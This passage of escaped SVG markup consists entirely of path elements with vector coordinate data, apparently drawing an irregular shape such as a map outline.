d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path 